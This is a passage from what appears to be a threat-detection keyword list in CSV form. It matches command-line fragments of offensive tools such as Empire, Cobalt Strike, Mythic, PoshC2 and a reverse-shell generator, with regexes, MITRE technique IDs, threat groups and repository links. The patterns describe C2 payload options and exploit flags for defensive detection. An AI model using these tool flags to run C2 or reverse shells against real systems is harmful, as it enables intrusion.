T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* payload add *",".{0,1000}\spayload\sadd\s.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "* --payload CommonsCollections*",".{0,1000}\s\-\-payload\sCommonsCollections.{0,1000}","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","shell spawning","https://github.com/aStrowxyu/Pysoserial","1","0","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z" "* payload start *",".{0,1000}\spayload\sstart\s.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "* --payload x64/c/ipv6 *",".{0,1000}\s\-\-payload\sx64\/c\/ipv6\s.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","N/A","Defense Evasion","https://github.com/mhaskar/DNSStager","1","0","N/A","10","6","598","132","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z" "* --payload_file * --payload_path*",".{0,1000}\s\-\-payload_file\s.{0,1000}\s\-\-payload_path.{0,1000}","offensive_tool_keyword","vRealizeLogInsightRCE","POC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs: VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711)","T1190 - T1071 - T1003 - T1069 - T1110 - T1222","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/horizon3ai/vRealizeLogInsightRCE","1","0","Added to cover the POC exploitation used in massive ransomware campagne that exploit public facing Vmware ESXI product ","N/A","2","150","24","2023-01-31T11:41:08Z","2023-01-30T22:01:08Z" "* payload_placement.exe*",".{0,1000}\spayload_placement\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* --payloadcookie *",".{0,1000}\s\-\-payloadcookie\s.{0,1000}","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","0","N/A","10","10","470","84","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" "* --payload-file pwn.bat*",".{0,1000}\s\-\-payload\-file\spwn\.bat.{0,1000}","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0003 - TA0002 - TA0011","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cnotin/SplunkWhisperer2","1","0","N/A","9","3","240","52","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z" "* -PayloadPath *",".{0,1000}\s\-PayloadPath\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-BypassUAC.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* PayloadsDirectory*",".{0,1000}\sPayloadsDirectory.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "* payloadtests.py*",".{0,1000}\spayloadtests\.py.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3252","785","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z" "* PayloadType.BIND_TCP*",".{0,1000}\sPayloadType\.BIND_TCP.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "* --payload-types all*",".{0,1000}\s\-\-payload\-types\sall.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "* --payload-types bin*",".{0,1000}\s\-\-payload\-types\sbin.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "* --payload-types dll*",".{0,1000}\s\-\-payload\-types\sdll.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "* --payload-types exe*",".{0,1000}\s\-\-payload\-types\sexe.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "* --payload-types ps1*",".{0,1000}\s\-\-payload\-types\sps1.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "* --payload-types py*",".{0,1000}\s\-\-payload\-types\spy.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "* --payload-types svc.exe*",".{0,1000}\s\-\-payload\-types\ssvc\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "* --payload-types vbs*",".{0,1000}\s\-\-payload\-types\svbs.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "* pcanywhere-brute.nse*",".{0,1000}\spcanywhere\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* pcworx-info.nse*",".{0,1000}\spcworx\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* pdf2john.py*",".{0,1000}\spdf2john\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "* -PE_Clone *",".{0,1000}\s\-PE_Clone\s.{0,1000}","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","0","N/A","10","10","971","149","2024-04-02T20:12:17Z","2021-08-06T20:55:26Z" "* -pe-exp-list *.dll*",".{0,1000}\s\-pe\-exp\-list\s.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "* -PEPath * -ExeArgs *",".{0,1000}\s\-PEPath\s.{0,1000}\s\-ExeArgs\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-PSInject.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* Perform S4U constrained delegation abuse*",".{0,1000}\sPerform\sS4U\sconstrained\sdelegation\sabuse.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "* perl-reverse-shell - *",".{0,1000}\sperl\-reverse\-shell\s\-\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "* -PermanentWMI *",".{0,1000}\s\-PermanentWMI\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 